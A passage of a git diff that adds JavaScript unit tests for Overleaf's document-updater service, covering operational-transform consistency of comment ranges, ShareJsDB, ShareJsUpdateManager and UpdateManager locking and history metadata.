(a.offset - b.offset === 0) { + return a.length - b.length + } else { + return a.offset - b.offset + } + }) + for (let i = 0; i < comments1.length; i++) { + const comment1 = comments1[i] + const comment2 = comments2[i] + if ( + comment1.offset !== comment2.offset || + comment1.length !== comment2.length + ) { + return false + } + } + return true + } + + const SNAPSHOT = '123' + + const OPS = [] + // Insert ops + for ( + p = 0, end = SNAPSHOT.length, asc = end >= 0; + asc ? p <= end : p >= end; + asc ? p++ : p-- + ) { + OPS.push({ i: 'a', p }) + OPS.push({ i: 'bc', p }) + } + for ( + p = 0, end1 = SNAPSHOT.length - 1, asc1 = end1 >= 0; + asc1 ? p <= end1 : p >= end1; + asc1 ? p++ : p-- + ) { + let asc2, end2 + for ( + length = 1, end2 = SNAPSHOT.length - p, asc2 = end2 >= 1; + asc2 ? length <= end2 : length >= end2; + asc2 ? length++ : length-- + ) { + OPS.push({ d: SNAPSHOT.slice(p, p + length), p }) + } + } + for ( + p = 0, end3 = SNAPSHOT.length - 1, asc3 = end3 >= 0; + asc3 ? p <= end3 : p >= end3; + asc3 ? p++ : p-- + ) { + let asc4, end4 + for ( + length = 1, end4 = SNAPSHOT.length - p, asc4 = end4 >= 1; + asc4 ? length <= end4 : length >= end4; + asc4 ? length++ : length-- + ) { + OPS.push({ c: SNAPSHOT.slice(p, p + length), p, t: this.t }) + } + } + + return (() => { + const result = [] + for (const op1 of Array.from(OPS)) { + result.push( + (() => { + const result1 = [] + for (const op2 of Array.from(OPS)) { + const op1T = transform(op1, op2, 'left') + const op2T = transform(op2, op1, 'right') + + const rt12 = new RangesTracker() + const snapshot12 = applySnapshot( + applySnapshot(SNAPSHOT, [op1]), + op2T + ) + applyRanges(rt12, [op1]) + applyRanges(rt12, op2T) + + const rt21 = new RangesTracker() + const snapshot21 = applySnapshot( + applySnapshot(SNAPSHOT, [op2]), + op1T + ) + applyRanges(rt21, [op2]) + applyRanges(rt21, op1T) + + if (snapshot12 !== snapshot21) { + console.error( + { + op1, + op2, + op1T, + op2T, + snapshot12, + snapshot21, + }, + 'Ops are not consistent' + ) + throw new Error('OT is inconsistent') + } + + if (!commentsEqual(rt12.comments, rt21.comments)) { + console.log(rt12.comments) + console.log(rt21.comments) + console.error( + { + op1, + op2, + op1T, + op2T, + rt12_comments: rt12.comments, + rt21_comments: rt21.comments, + }, + 'Comments are not consistent' + ) + throw new Error('OT is inconsistent') + } else { + result1.push(undefined) + } + } + return result1 + })() + ) + } + return result + })() + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ShareJsDB/ShareJsDBTests.js b/services/document-updater/test/unit/js/ShareJsDB/ShareJsDBTests.js new file mode 100644 index 0000000..f122a8a --- /dev/null +++ b/services/document-updater/test/unit/js/ShareJsDB/ShareJsDBTests.js @@ -0,0 +1,181 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../../app/js/ShareJsDB.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors') + +describe('ShareJsDB', function () { + beforeEach(function () { + this.doc_id = 'document-id' + this.project_id = 'project-id' + this.doc_key = `${this.project_id}:${this.doc_id}` + this.callback = sinon.stub() + this.ShareJsDB = SandboxedModule.require(modulePath, { + requires: { + './RedisManager': (this.RedisManager = { + getPreviousDocOps: sinon.stub(), + }), + './Errors': Errors, + '@overleaf/metrics': { + inc: sinon.stub(), + histogram: sinon.stub(), + Timer: class Timer { + done() {} + }, + }, + }, + }) + + this.version = 42 + this.lines = ['one', 'two', 'three'] + return (this.db = new this.ShareJsDB( + this.project_id, + this.doc_id, + this.lines, + this.version + )) + }) + + describe('getSnapshot', function () { + describe('successfully', function () { + beforeEach(function () { + return this.db.getSnapshot(this.doc_key, this.callback) + }) + + it('should return the doc lines', function () { + return this.callback.args[0][1].snapshot.should.equal( + this.lines.join('\n') + ) + }) + + it('should return the doc version', function () { + return this.callback.args[0][1].v.should.equal(this.version) + }) + + return it('should return the type as text', function () { + return this.callback.args[0][1].type.should.equal('text') + }) + }) + + return describe('when the key does not match', function () { + beforeEach(function () { + return this.db.getSnapshot('bad:key', this.callback) + }) + + return it('should return the callback with a NotFoundError', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Errors.NotFoundError)) + .should.equal(true) + }) + }) + }) + + describe('getOps', function () { + describe('with start == end', function () { + beforeEach(function () { + this.start = this.end = 42 + return this.db.getOps(this.doc_key, this.start, this.end, this.callback) + }) + + it('should not talk to redis', function () { + this.RedisManager.getPreviousDocOps.should.not.have.been.called + }) + + return it('should return an empty array', function () { + return this.callback.calledWith(null, []).should.equal(true) + }) + }) + + describe('with start == redis-version and end unset', function () { + beforeEach(function () { + const start = this.version + const end = null + this.db.getOps(this.doc_key, start, end, this.callback) + }) + + it('should not talk to redis', function () { + this.RedisManager.getPreviousDocOps.should.not.have.been.called + }) + + it('should return an empty array', function () { + this.callback.should.have.been.calledWith(null, []) + }) + }) + + describe('with a non empty range', function () { + beforeEach(function () { + this.start = 35 + this.end = 42 + this.ops = new Array(this.end - this.start) + this.RedisManager.getPreviousDocOps = sinon + .stub() + .callsArgWith(3, null, this.ops) + return this.db.getOps(this.doc_key, this.start, this.end, this.callback) + }) + + it('should get the range from redis', function () { + return this.RedisManager.getPreviousDocOps + .calledWith(this.doc_id, this.start, this.end - 1) + .should.equal(true) + }) + + return it('should return the ops', function () { + return this.callback.calledWith(null, this.ops).should.equal(true) + }) + }) + + return describe('with no specified end', function () { + beforeEach(function () { + this.start = 35 + this.end = null + this.ops = [] + this.RedisManager.getPreviousDocOps = sinon + .stub() + .callsArgWith(3, null, this.ops) + return this.db.getOps(this.doc_key, this.start, this.end, this.callback) + }) + + return it('should get until the end of the list', function () { + return this.RedisManager.getPreviousDocOps + .calledWith(this.doc_id, this.start, -1) + .should.equal(true) + }) + }) + }) + + return describe('writeOps', function () { + return describe('writing an op', function () { + beforeEach(function () { + this.opData = { + op: { p: 20, t: 'foo' }, + meta: { source: 'bar' }, + v: this.version, + } + return this.db.writeOp(this.doc_key, this.opData, this.callback) + }) + + it('should write into appliedOps', function () { + return expect(this.db.appliedOps[this.doc_key]).to.deep.equal([ + this.opData, + ]) + }) + + return it('should call the callback without an error', function () { + this.callback.called.should.equal(true) + return (this.callback.args[0][0] != null).should.equal(false) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/ShareJsUpdateManager/ShareJsUpdateManagerTests.js b/services/document-updater/test/unit/js/ShareJsUpdateManager/ShareJsUpdateManagerTests.js new file mode 100644 index 0000000..e699439 --- /dev/null +++ b/services/document-updater/test/unit/js/ShareJsUpdateManager/ShareJsUpdateManagerTests.js @@ -0,0 +1,237 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const modulePath = '../../../../app/js/ShareJsUpdateManager.js' +const SandboxedModule = require('sandboxed-module') +const crypto = require('node:crypto') + +describe('ShareJsUpdateManager', function () { + beforeEach(function () { + let Model + this.project_id = 'project-id-123' + this.doc_id = 'document-id-123' + this.callback = sinon.stub() + return (this.ShareJsUpdateManager = SandboxedModule.require(modulePath, { + requires: { + './sharejs/server/model': (Model = class Model { + constructor(db) { + this.db = db + } + }), + './ShareJsDB': (this.ShareJsDB = { mockDB: true }), + '@overleaf/redis-wrapper': { + createClient: () => { + return (this.rclient = { auth() {} }) + }, + }, + './RealTimeRedisManager': (this.RealTimeRedisManager = { + sendCanaryAppliedOp: sinon.stub(), + }), + './Metrics': (this.metrics = { inc: sinon.stub() }), + }, + globals: { + clearTimeout: (this.clearTimeout = sinon.stub()), + }, + })) + }) + + describe('applyUpdate', function () { + beforeEach(function () { + this.lines = ['one', 'two'] + this.version = 34 + this.updatedDocLines = ['onefoo', 'two'] + const content = this.updatedDocLines.join('\n') + this.hash = crypto + .createHash('sha1') + .update('blob ' + content.length + '\x00') + .update(content, 'utf8') + .digest('hex') + this.update = { p: 4, t: 'foo', v: this.version, hash: this.hash } + this.model = { + applyOp: sinon.stub().callsArg(2), + getSnapshot: sinon.stub(), + db: { + appliedOps: {}, + }, + } + this.ShareJsUpdateManager.getNewShareJsModel = sinon + .stub() + .returns(this.model) + this.ShareJsUpdateManager._listenForOps = sinon.stub() + return (this.ShareJsUpdateManager.removeDocFromCache = sinon + .stub() + .callsArg(1)) + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.model.getSnapshot.callsArgWith(1, null, { + snapshot: this.updatedDocLines.join('\n'), + v: this.version, + }) + this.model.db.appliedOps[`${this.project_id}:${this.doc_id}`] = + this.appliedOps = ['mock-ops'] + return this.ShareJsUpdateManager.applyUpdate( + this.project_id, + this.doc_id, + this.update, + this.lines, + this.version, + (err, docLines, version, appliedOps) => { + this.callback(err, docLines, version, appliedOps) + return done() + } + ) + }) + + it('should create a new ShareJs model', function () { + return this.ShareJsUpdateManager.getNewShareJsModel + .calledWith(this.project_id, this.doc_id, this.lines, this.version) + .should.equal(true) + }) + + it('should listen for ops on the model', function () { + return this.ShareJsUpdateManager._listenForOps + .calledWith(this.model) + .should.equal(true) + }) + + it('should send the update to ShareJs', function () { + return this.model.applyOp + .calledWith(`${this.project_id}:${this.doc_id}`, this.update) + .should.equal(true) + }) + + it('should get the updated doc lines', function () { + return this.model.getSnapshot + .calledWith(`${this.project_id}:${this.doc_id}`) + .should.equal(true) + }) + + return it('should return the updated doc lines, version and ops', function () { + return this.callback + .calledWith(null, this.updatedDocLines, this.version, this.appliedOps) + .should.equal(true) + }) + }) + + describe('when applyOp fails', function () { + beforeEach(function (done) { + this.error = new Error('Something went wrong') + this.model.applyOp = sinon.stub().callsArgWith(2, this.error) + return this.ShareJsUpdateManager.applyUpdate( + this.project_id, + this.doc_id, + this.update, + this.lines, + this.version, + (err, docLines, version) => { + this.callback(err, docLines, version) + return done() + } + ) + }) + + return it('should call the callback with the error', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('when getSnapshot fails', function () { + beforeEach(function (done) { + this.error = new Error('Something went wrong') + this.model.getSnapshot.callsArgWith(1, this.error) + return this.ShareJsUpdateManager.applyUpdate( + this.project_id, + this.doc_id, + this.update, + this.lines, + this.version, + (err, docLines, version) => { + this.callback(err, docLines, version) + return done() + } + ) + }) + + return it('should call the callback with the error', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + return describe('with an invalid hash', function () { + beforeEach(function (done) { + this.error = new Error('invalid hash') + this.model.getSnapshot.callsArgWith(1, null, { + snapshot: 'unexpected content', + v: this.version, + }) + this.model.db.appliedOps[`${this.project_id}:${this.doc_id}`] = + this.appliedOps = ['mock-ops'] + return this.ShareJsUpdateManager.applyUpdate( + this.project_id, + this.doc_id, + this.update, + this.lines, + this.version, + (err, docLines, version, appliedOps) => { + this.callback(err, docLines, version, appliedOps) + return done() + } + ) + }) + + return it('should call the callback with the error', function () { + return this.callback + .calledWith(sinon.match.instanceOf(Error)) + .should.equal(true) + }) + }) + }) + + return describe('_listenForOps', function () { + beforeEach(function () { + this.model = { + on: (event, callback) => { + return (this.callback = callback) + }, + } + sinon.spy(this.model, 'on') + return this.ShareJsUpdateManager._listenForOps(this.model) + }) + + it('should listen to the model for updates', function () { + return this.model.on.calledWith('applyOp').should.equal(true) + }) + + return describe('the callback', function () { + beforeEach(function () { + this.opData = { + op: { t: 'foo', p: 1 }, + meta: { source: 'bar' }, + } + this.RealTimeRedisManager.sendData = sinon.stub() + return this.callback(`${this.project_id}:${this.doc_id}`, this.opData) + }) + + return it('should publish the op to redis', function () { + return this.RealTimeRedisManager.sendData + .calledWith({ + project_id: this.project_id, + doc_id: this.doc_id, + op: this.opData, + }) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/UpdateManager/UpdateManagerTests.js b/services/document-updater/test/unit/js/UpdateManager/UpdateManagerTests.js new file mode 100644 index 0000000..dba6645 --- /dev/null +++ b/services/document-updater/test/unit/js/UpdateManager/UpdateManagerTests.js @@ -0,0 +1,836 @@ +const { createHash } = require('node:crypto') +const sinon = require('sinon') +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') + +const MODULE_PATH = '../../../../app/js/UpdateManager.js' + +describe('UpdateManager', function () { + beforeEach(function () { + this.project_id = 'project-id-123' + this.projectHistoryId = 'history-id-123' + this.doc_id = 'document-id-123' + this.lockValue = 'mock-lock-value' + this.pathname = '/a/b/c.tex' + + this.Metrics = { + inc: sinon.stub(), + Timer: class Timer {}, + } + this.Metrics.Timer.prototype.done = sinon.stub() + + this.Profiler = class Profiler {} + this.Profiler.prototype.log = sinon.stub().returns({ end: sinon.stub() }) + this.Profiler.prototype.end = sinon.stub() + + this.LockManager = { + promises: { + tryLock: sinon.stub().resolves(this.lockValue), + getLock: sinon.stub().resolves(this.lockValue), + releaseLock: sinon.stub().resolves(), + }, + } + + this.RedisManager = { + promises: { + setDocument: sinon.stub().resolves(), + updateDocument: sinon.stub(), + }, + } + + this.RealTimeRedisManager = { + sendData: sinon.stub(), + promises: { + getUpdatesLength: sinon.stub(), + getPendingUpdatesForDoc: sinon.stub(), + }, + } + + this.ShareJsUpdateManager = { + promises: { + applyUpdate: sinon.stub(), + }, + } + + this.HistoryManager = { + recordAndFlushHistoryOps: sinon.stub(), + } + + this.Settings = {} + + this.DocumentManager = { + promises: { + getDoc: sinon.stub(), + }, + } + + this.RangesManager = { + applyUpdate: sinon.stub(), + } + + this.SnapshotManager = { + promises: { + recordSnapshot: sinon.stub().resolves(), + }, + } + + this.ProjectHistoryRedisManager = { + promises: { + queueOps: sinon + .stub() + .callsFake(async (projectId, ...ops) => ops.length), + }, + } + + this.UpdateManager = SandboxedModule.require(MODULE_PATH, { + requires: { + './LockManager': this.LockManager, + './RedisManager': this.RedisManager, + './RealTimeRedisManager': this.RealTimeRedisManager, + './ShareJsUpdateManager': this.ShareJsUpdateManager, + './HistoryManager': this.HistoryManager, + './Metrics': this.Metrics, + '@overleaf/settings': this.Settings, + './DocumentManager': this.DocumentManager, + './RangesManager': this.RangesManager, + './SnapshotManager': this.SnapshotManager, + './Profiler': this.Profiler, + './ProjectHistoryRedisManager': this.ProjectHistoryRedisManager, + }, + }) + }) + + describe('processOutstandingUpdates', function () { + beforeEach(async function () { + this.UpdateManager.promises.fetchAndApplyUpdates = sinon.stub().resolves() + await this.UpdateManager.promises.processOutstandingUpdates( + this.project_id, + this.doc_id + ) + }) + + it('should apply the updates', function () { + this.UpdateManager.promises.fetchAndApplyUpdates + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should time the execution', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('processOutstandingUpdatesWithLock', function () { + describe('when the lock is free', function () { + beforeEach(function () { + this.UpdateManager.promises.continueProcessingUpdatesWithLock = sinon + .stub() + .resolves() + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .resolves() + }) + + describe('successfully', function () { + beforeEach(async function () { + await this.UpdateManager.promises.processOutstandingUpdatesWithLock( + this.project_id, + this.doc_id + ) + }) + + it('should acquire the lock', function () { + this.LockManager.promises.tryLock + .calledWith(this.doc_id) + .should.equal(true) + }) + + it('should free the lock', function () { + this.LockManager.promises.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + + it('should process the outstanding updates', function () { + this.UpdateManager.promises.processOutstandingUpdates + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should do everything with the lock acquired', function () { + this.UpdateManager.promises.processOutstandingUpdates + .calledAfter(this.LockManager.promises.tryLock) + .should.equal(true) + this.UpdateManager.promises.processOutstandingUpdates + .calledBefore(this.LockManager.promises.releaseLock) + .should.equal(true) + }) + + it('should continue processing new updates that may have come in', function () { + this.UpdateManager.promises.continueProcessingUpdatesWithLock + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when processOutstandingUpdates returns an error', function () { + beforeEach(async function () { + this.error = new Error('Something went wrong') + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .rejects(this.error) + await expect( + this.UpdateManager.promises.processOutstandingUpdatesWithLock( + this.project_id, + this.doc_id + ) + ).to.be.rejectedWith(this.error) + }) + + it('should free the lock', function () { + this.LockManager.promises.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + }) + }) + + describe('when the lock is taken', function () { + beforeEach(async function () { + this.LockManager.promises.tryLock.resolves(null) + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .resolves() + await this.UpdateManager.promises.processOutstandingUpdatesWithLock( + this.project_id, + this.doc_id + ) + }) + + it('should not process the updates', function () { + this.UpdateManager.promises.processOutstandingUpdates.called.should.equal( + false + ) + }) + }) + }) + + describe('continueProcessingUpdatesWithLock', function () { + describe('when there are outstanding updates', function () { + beforeEach(async function () { + this.RealTimeRedisManager.promises.getUpdatesLength.resolves(3) + this.UpdateManager.promises.processOutstandingUpdatesWithLock = sinon + .stub() + .resolves() + await this.UpdateManager.promises.continueProcessingUpdatesWithLock( + this.project_id, + this.doc_id + ) + }) + + it('should process the outstanding updates', function () { + this.UpdateManager.promises.processOutstandingUpdatesWithLock + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when there are no outstanding updates', function () { + beforeEach(async function () { + this.RealTimeRedisManager.promises.getUpdatesLength.resolves(0) + this.UpdateManager.promises.processOutstandingUpdatesWithLock = sinon + .stub() + .resolves() + await this.UpdateManager.promises.continueProcessingUpdatesWithLock( + this.project_id, + this.doc_id + ) + }) + + it('should not try to process the outstanding updates', function () { + this.UpdateManager.promises.processOutstandingUpdatesWithLock.called.should.equal( + false + ) + }) + }) + }) + + describe('fetchAndApplyUpdates', function () { + describe('with updates', function () { + beforeEach(async function () { + this.updates = [{ p: 1, t: 'foo' }] + this.updatedDocLines = ['updated', 'lines'] + this.version = 34 + this.RealTimeRedisManager.promises.getPendingUpdatesForDoc.resolves( + this.updates + ) + this.UpdateManager.promises.applyUpdate = sinon.stub().resolves() + await this.UpdateManager.promises.fetchAndApplyUpdates( + this.project_id, + this.doc_id + ) + }) + + it('should get the pending updates', function () { + this.RealTimeRedisManager.promises.getPendingUpdatesForDoc + .calledWith(this.doc_id) + .should.equal(true) + }) + + it('should apply the updates', function () { + this.updates.map(update => + this.UpdateManager.promises.applyUpdate + .calledWith(this.project_id, this.doc_id, update) + .should.equal(true) + ) + }) + }) + + describe('when there are no updates', function () { + beforeEach(async function () { + this.updates = [] + this.RealTimeRedisManager.promises.getPendingUpdatesForDoc.resolves( + this.updates + ) + this.UpdateManager.promises.applyUpdate = sinon.stub().resolves() + await this.UpdateManager.promises.fetchAndApplyUpdates( + this.project_id, + this.doc_id + ) + }) + + it('should not call applyUpdate', function () { + this.UpdateManager.promises.applyUpdate.called.should.equal(false) + }) + }) + }) + + describe('applyUpdate', function () { + beforeEach(function () { + this.updateMeta = { user_id: 'last-author-fake-id' } + this.update = { op: [{ p: 42, i: 'foo' }], meta: this.updateMeta } + this.updatedDocLines = ['updated', 'lines'] + this.version = 34 + this.lines = ['original', 'lines'] + this.ranges = { entries: 'mock', comments: 'mock' } + this.updated_ranges = { entries: 'updated', comments: 'updated' } + this.appliedOps = [ + { v: 42, op: 'mock-op-42' }, + { v: 45, op: 'mock-op-45' }, + ] + this.historyUpdates = [ + 'history-update-1', + 'history-update-2', + 'history-update-3', + ] + this.project_ops_length = 123 + this.DocumentManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: false, + }) + this.RangesManager.applyUpdate.returns({ + newRanges: this.updated_ranges, + rangesWereCollapsed: false, + historyUpdates: this.historyUpdates, + }) + this.ShareJsUpdateManager.promises.applyUpdate = sinon.stub().resolves({ + updatedDocLines: this.updatedDocLines, + version: this.version, + appliedOps: this.appliedOps, + }) + this.RedisManager.promises.updateDocument.resolves() + this.UpdateManager.promises._adjustHistoryUpdatesMetadata = sinon.stub() + }) + + describe('normally', function () { + beforeEach(async function () { + await this.UpdateManager.promises.applyUpdate( + this.project_id, + this.doc_id, + this.update + ) + }) + + it('should apply the updates via ShareJS', function () { + this.ShareJsUpdateManager.promises.applyUpdate + .calledWith( + this.project_id, + this.doc_id, + this.update, + this.lines, + this.version + ) + .should.equal(true) + }) + + it('should update the ranges', function () { + this.RangesManager.applyUpdate + .calledWith( + this.project_id, + this.doc_id, + this.ranges, + this.appliedOps, + this.updatedDocLines + ) + .should.equal(true) + }) + + it('should save the document', function () { + this.RedisManager.promises.updateDocument + .calledWith( + this.project_id, + this.doc_id, + this.updatedDocLines, + this.version, + this.appliedOps, + this.updated_ranges, + this.updateMeta + ) + .should.equal(true) + }) + + it('should add metadata to the ops', function () { + this.UpdateManager.promises._adjustHistoryUpdatesMetadata.should.have.been.calledWith( + this.historyUpdates, + this.pathname, + this.projectHistoryId, + this.lines, + this.ranges, + this.updatedDocLines + ) + }) + + it('should push the applied ops into the history queue', function () { + this.ProjectHistoryRedisManager.promises.queueOps.should.have.been.calledWith( + this.project_id, + ...this.historyUpdates.map(op => JSON.stringify(op)) + ) + this.HistoryManager.recordAndFlushHistoryOps.should.have.been.calledWith( + this.project_id, + this.historyUpdates, + this.historyUpdates.length + ) + }) + }) + + describe('with UTF-16 surrogate pairs in the update', function () { + beforeEach(async function () { + this.update = { op: [{ p: 42, i: '\uD835\uDC00' }] } + await this.UpdateManager.promises.applyUpdate( + this.project_id, + this.doc_id, + this.update + ) + }) + + it('should apply the update but with surrogate pairs removed', function () { + this.ShareJsUpdateManager.promises.applyUpdate + .calledWith(this.project_id, this.doc_id, this.update) + .should.equal(true) + + // \uFFFD is 'replacement character' + this.update.op[0].i.should.equal('\uFFFD\uFFFD') + }) + }) + + describe('with an error', function () { + beforeEach(async function () { + this.error = new Error('something went wrong') + this.ShareJsUpdateManager.promises.applyUpdate.rejects(this.error) + await expect( + this.UpdateManager.promises.applyUpdate( + this.project_id, + this.doc_id, + this.update + ) + ).to.be.rejectedWith(this.error) + }) + + it('should call RealTimeRedisManager.sendData with the error', function () { + this.RealTimeRedisManager.sendData + .calledWith({ + project_id: this.project_id, + doc_id: this.doc_id, + error: this.error.message, + }) + .should.equal(true) + }) + }) + + describe('when ranges get collapsed', function () { + beforeEach(async function () { + this.RangesManager.applyUpdate.returns({ + newRanges: this.updated_ranges, + rangesWereCollapsed: true, + historyUpdates: this.historyUpdates, + }) + await this.UpdateManager.promises.applyUpdate( + this.project_id, + this.doc_id, + this.update + ) + }) + + it('should increment the doc-snapshot metric', function () { + this.Metrics.inc.calledWith('doc-snapshot').should.equal(true) + }) + + it('should call SnapshotManager.recordSnapshot', function () { + this.SnapshotManager.promises.recordSnapshot + .calledWith( + this.project_id, + this.doc_id, + this.version, + this.pathname, + this.lines, + this.ranges + ) + .should.equal(true) + }) + }) + + describe('when history ranges are supported', function () { + beforeEach(async function () { + this.DocumentManager.promises.getDoc.resolves({ + lines: this.lines, + version: this.version, + ranges: this.ranges, + pathname: this.pathname, + projectHistoryId: this.projectHistoryId, + historyRangesSupport: true, + }) + await this.UpdateManager.promises.applyUpdate( + this.project_id, + this.doc_id, + this.update + ) + }) + + it('should push the history updates into the history queue', function () { + this.ProjectHistoryRedisManager.promises.queueOps.should.have.been.calledWith( + this.project_id, + ...this.historyUpdates.map(op => JSON.stringify(op)) + ) + this.HistoryManager.recordAndFlushHistoryOps.should.have.been.calledWith( + this.project_id, + this.historyUpdates, + this.historyUpdates.length + ) + }) + }) + }) + + describe('_adjustHistoryUpdatesMetadata', function () { + beforeEach(function () { + this.lines = ['some', 'test', 'data'] + this.updatedDocLines = ['after', 'updates'] + this.historyUpdates = [ + { + v: 42, + op: [ + { i: 'bing', p: 12, trackedDeleteRejection: true }, + { i: 'foo', p: 4 }, + { i: 'bar', p: 6 }, + ], + }, + { + v: 45, + op: [ + { d: 'qux', p: 4 }, + { i: 'bazbaz', p: 14 }, + { + d: 'bong', + p: 28, + trackedChanges: [{ type: 'insert', offset: 0, length: 4 }], + }, + ], + meta: { + tc: 'tracking-info', + }, + }, + { + v: 47, + op: [{ d: 'so', p: 0 }], + }, + { v: 49, op: [{ i: 'penguin', p: 18 }] }, + ] + this.ranges = { + changes: [ + { op: { d: 'bingbong', p: 12 } }, + { op: { i: 'test', p: 5 } }, + ], + } + }) + + it('should add projectHistoryId, pathname and doc_length metadata to the ops', function () { + this.UpdateManager._adjustHistoryUpdatesMetadata( + this.historyUpdates, + this.pathname, + this.projectHistoryId, + this.lines, + this.updatedDocLines, + this.ranges, + false + ) + this.historyUpdates.should.deep.equal([ + { + projectHistoryId: this.projectHistoryId, + v: 42, + op: [ + { i: 'bing', p: 12, trackedDeleteRejection: true }, + { i: 'foo', p: 4 }, + { i: 'bar', p: 6 }, + ], + meta: { + pathname: this.pathname, + doc_length: 14, + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 45, + op: [ + { d: 'qux', p: 4 }, + { i: 'bazbaz', p: 14 }, + { + d: 'bong', + p: 28, + trackedChanges: [{ type: 'insert', offset: 0, length: 4 }], + }, + ], + meta: { + pathname: this.pathname, + doc_length: 24, // 14 + 'bing' + 'foo' + 'bar' + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 47, + op: [{ d: 'so', p: 0 }], + meta: { + pathname: this.pathname, + doc_length: 23, // 24 - 'qux' + 'bazbaz' - 'bong' + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 49, + op: [{ i: 'penguin', p: 18 }], + meta: { + pathname: this.pathname, + doc_length: 21, // 23 - 'so' + }, + }, + ]) + }) + + it('should add additional metadata when ranges support is enabled', function () { + this.UpdateManager._adjustHistoryUpdatesMetadata( + this.historyUpdates, + this.pathname, + this.projectHistoryId, + this.lines, + this.ranges, + this.updatedDocLines, + true + ) + this.historyUpdates.should.deep.equal([ + { + projectHistoryId: this.projectHistoryId, + v: 42, + op: [ + { i: 'bing', p: 12, trackedDeleteRejection: true }, + { i: 'foo', p: 4 }, + { i: 'bar', p: 6 }, + ], + meta: { + pathname: this.pathname, + doc_length: 14, + history_doc_length: 22, + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 45, + op: [ + { d: 'qux', p: 4 }, + { i: 'bazbaz', p: 14 }, + { + d: 'bong', + p: 28, + trackedChanges: [{ type: 'insert', offset: 0, length: 4 }], + }, + ], + meta: { + pathname: this.pathname, + doc_length: 24, // 14 + 'bing' + 'foo' + 'bar' + history_doc_length: 28, // 22 + 'foo' + 'bar' + tc: 'tracking-info', + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 47, + op: [{ d: 'so', p: 0 }], + meta: { + pathname: this.pathname, + doc_length: 23, // 24 - 'qux' + 'bazbaz' - 'bong' + history_doc_length: 30, // 28 - 'bong' + 'bazbaz' + }, + }, + { + projectHistoryId: this.projectHistoryId, + v: 49, + op: [{ i: 'penguin', p: 18 }], + meta: { + pathname: this.pathname, + doc_length: 21, // 23 - 'so' + doc_hash: stringHash(this.updatedDocLines.join('\n')), + history_doc_length: 28, // 30 - 'so' + }, + }, + ]) + }) + + it('should calculate the right doc length for an empty document', function () { + this.historyUpdates = [{ v: 42, op: [{ i: 'foobar', p: 0 }] }] + this.UpdateManager._adjustHistoryUpdatesMetadata( + this.historyUpdates, + this.pathname, + this.projectHistoryId, + [], + {}, + ['foobar'], + false + ) + this.historyUpdates.should.deep.equal([ + { + projectHistoryId: this.projectHistoryId, + v: 42, + op: [{ i: 'foobar', p: 0 }], + meta: { + pathname: this.pathname, + doc_length: 0, + }, + }, + ]) + }) + }) + + describe('lockUpdatesAndDo', function () { + beforeEach(function () { + this.methodResult = 'method result' + this.method = sinon.stub().resolves(this.methodResult) + this.arg1 = 'argument 1' + }) + + describe('successfully', function () { + beforeEach(async function () { + this.UpdateManager.promises.continueProcessingUpdatesWithLock = sinon + .stub() + .resolves() + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .resolves() + this.response = await this.UpdateManager.promises.lockUpdatesAndDo( + this.method, + this.project_id, + this.doc_id, + this.arg1 + ) + }) + + it('should lock the doc', function () { + this.LockManager.promises.getLock + .calledWith(this.doc_id) + .should.equal(true) + }) + + it('should process any outstanding updates', function () { + this.UpdateManager.promises.processOutstandingUpdates.should.have.been.calledWith( + this.project_id, + this.doc_id + ) + }) + + it('should call the method', function () { + this.method + .calledWith(this.project_id, this.doc_id, this.arg1) + .should.equal(true) + }) + + it('should return the method response arguments', function () { + expect(this.response).to.equal(this.methodResult) + }) + + it('should release the lock', function () { + this.LockManager.promises.releaseLock + .calledWith(this.doc_id, this.lockValue) + .should.equal(true) + }) + + it('should continue processing updates', function () { + this.UpdateManager.promises.continueProcessingUpdatesWithLock + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + }) + + describe('when processOutstandingUpdates returns an error', function () { + beforeEach(async function () { + this.error = new Error('Something went wrong') + this.UpdateManager.promises.processOutstandingUpdates = sinon + .stub() + .rejects(this.error) + await expect( + this.UpdateManager.promises.lockUpdatesAndDo( + this.method, + this.project_id, + this.doc_id, + this.arg1 + ) + ).to.be.rejectedWith(this.error) + }) + + it('should free the lock', function () { + this.LockManager.promises.releaseLock + .calledWith(this.doc_id, this.lockValue) + 